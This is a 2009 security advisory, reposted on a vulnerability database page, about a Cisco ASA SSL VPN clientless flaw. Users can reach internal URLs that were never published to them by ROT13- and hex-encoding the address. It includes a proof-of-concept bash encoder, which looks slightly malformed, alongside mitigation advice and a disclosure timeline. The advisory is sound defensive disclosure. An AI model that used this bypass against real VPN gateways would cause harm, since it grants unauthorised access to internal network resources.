Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22967
HistoryDec 17, 2009 - 12:00 a.m.

[ISecAuditors Security Advisories] Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

2009-12-1700:00:00
vulners.com
38
JSON

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-013

  • Original release date: December 7th, 2009
  • Last revised: December 16th, 2009
  • Discovered by: David Eduardo Acosta Rodriguez
  • Severity: 4/10 (CVSS Base Score)
    =============================================

I. VULNERABILITY

Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

II. BACKGROUND

Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated
Services Routers to extend network resources to virtually any remote
user with access to the Internet and a web browser.

III. DESCRIPTION

Cisco VPN SSL Clientless lets administrators define rules to specific
targets within the private network that WebVPN users will be able to
access. This specific targets are published using links in VPN SSL
home page. These links (URL) are protected (obfuscated) using a ROT13
substitution[2] and converting ASCII characters to hexadecimal. An
user with a valid account and without "URL entry" can access any
internal/external resource simply taken an URL, encrypt with ROT 13,
convert ASCII characters to hexadecimal and appending this string to
Cisco VPN SSL URL.

IV. PROOF OF CONCEPT

Using URL http://intranet published on internal server (not accessible
from home page):

  1. Convert string to ROT13: uggc://vagenarg
  2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
  3. Append string to Cisco VPN SSL:
    https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++

This is a simple PoC for easy demonstration:

#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od
-tx1 | cut -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n $b; echo -n "++";
echo "";

V. BUSINESS IMPACT

Users with valid account can surf to internal/external resources,
bypassing controls in home page.

VI. SYSTEMS AFFECTED

Cisco ASA <= 8.x are vulnerable.

VII. SOLUTION

Always set "webtype" ACL and "filter" to block access in Web VPN SSL
(not activated by default). Included in Cisco site now.
Follow recommendations from "Cisco Understanding Features Not
Supported in Clientless SSL VPN" [3].

VIII. REFERENCES

[1] www.cisco.com/web/go/sslvpn
[2] http://en.wikipedia.org/wiki/ROT13
[3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/
guide/webvpn.html#wp999589
http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
http://www.isecauditors.com

IX. CREDITS

This vulnerability has been discovered by
David Eduardo Acosta Rodriguez (deacosta (at) isecauditors (dot) com,
dacosta (at) computer (dot) org).
Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com))
for additional research.

X. REVISION HISTORY

December 7, 2009: Initial release.
December 16, 2009: Last revision.

XI. DISCLOSURE TIMELINE

December 9, 2009: Vendor contacted
December 9, 2009: Vendor response, they include our mitigation
proposal in their website and start the analysis
of correction required.
December 16, 2009: Vendor confirms remediation and public statement.
December 17, 2009: Sent to lists.

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

JSON